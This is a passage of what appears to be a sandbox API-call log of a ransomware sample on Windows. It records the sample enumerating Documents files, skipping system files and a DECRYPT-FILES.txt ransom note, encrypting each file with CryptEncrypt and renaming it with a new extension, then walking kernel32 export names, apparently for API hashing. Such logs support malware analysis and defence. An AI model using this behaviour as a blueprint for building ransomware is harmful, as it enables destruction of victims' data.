lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.927] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx") returned 61 [0084.927] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx.a6YP4") returned 67 [0084.927] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgeodxet30sbcoqn.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx.a6YP4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgeodxet30sbcoqn.xlsx.a6yp4"), dwFlags=0x0) returned 1 [0084.928] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.928] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.928] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.928] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7088860, ftCreationTime.dwHighDateTime=0x1d547b2, ftLastAccessTime.dwLowDateTime=0x4b046950, ftLastAccessTime.dwHighDateTime=0x1d5158d, ftLastWriteTime.dwLowDateTime=0x4b046950, ftLastWriteTime.dwHighDateTime=0x1d5158d, nFileSizeHigh=0x0, nFileSizeLow=0x6f56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMaUz.pptx", cAlternateFileName="XMAUZ~1.PPT")) returned 1 [0084.928] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="autorun.inf") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="boot.ini") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="desktop.ini") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="ntuser.dat") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="iconcache.db") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="bootsect.bak") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="ntuser.dat.log") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="thumbs.db") returned 1 [0084.929] lstrcmpiW (lpString1="xMaUz.pptx", lpString2="Bootfont.bin") returned 1 [0084.929] lstrlenW (lpString="xMaUz.pptx") returned 10 [0084.929] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0084.929] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0084.929] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0084.929] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0084.929] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.929] lstrlenW (lpString="xMaUz.pptx") returned 10 [0084.929] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.929] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="xMaUz.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx" [0084.929] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xmauz.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.929] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=28502) returned 1 [0084.929] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.930] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.930] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.930] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.930] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.930] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.930] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.931] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.931] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.932] CloseHandle (hObject=0x414) returned 1 [0084.932] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.932] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.933] CloseHandle (hObject=0x0) returned 0 [0084.933] CloseHandle (hObject=0x410) returned 1 [0084.933] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.933] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.934] GetTickCount () returned 0x114db14 [0084.934] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.934] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.934] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.934] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.935] lstrlenA (lpString="kernel32.dll") returned 12 [0084.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.935] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.935] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.935] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.935] lstrlenA (lpString="ADDATOMA") returned 8 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.935] lstrlenA (lpString="ADDATOMW") returned 8 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.935] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.935] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.935] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.935] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.935] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.935] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.935] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.935] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.936] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.936] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.936] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.936] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.936] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.936] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.936] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.936] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.936] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.936] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.936] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.936] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.936] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.936] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.936] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.936] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.936] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.936] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.936] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.937] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.937] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.937] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.937] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.937] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.937] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.937] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.937] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.937] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.937] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.937] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.937] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.937] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.937] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.937] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.937] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.937] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.937] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.938] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.938] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.938] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.938] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.938] lstrlenA (lpString="BEEP") returned 4 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.938] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.938] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.938] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.938] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.938] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.938] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.938] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.938] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.938] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.939] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.939] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.939] lstrlenA (lpString="CANCELIO") returned 8 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.939] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.939] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.939] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.939] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.939] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.939] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.939] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.939] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.939] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.939] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.939] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.939] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.939] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.939] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.939] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.940] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.940] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.940] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.940] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.940] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.940] lstrcpyA (in: 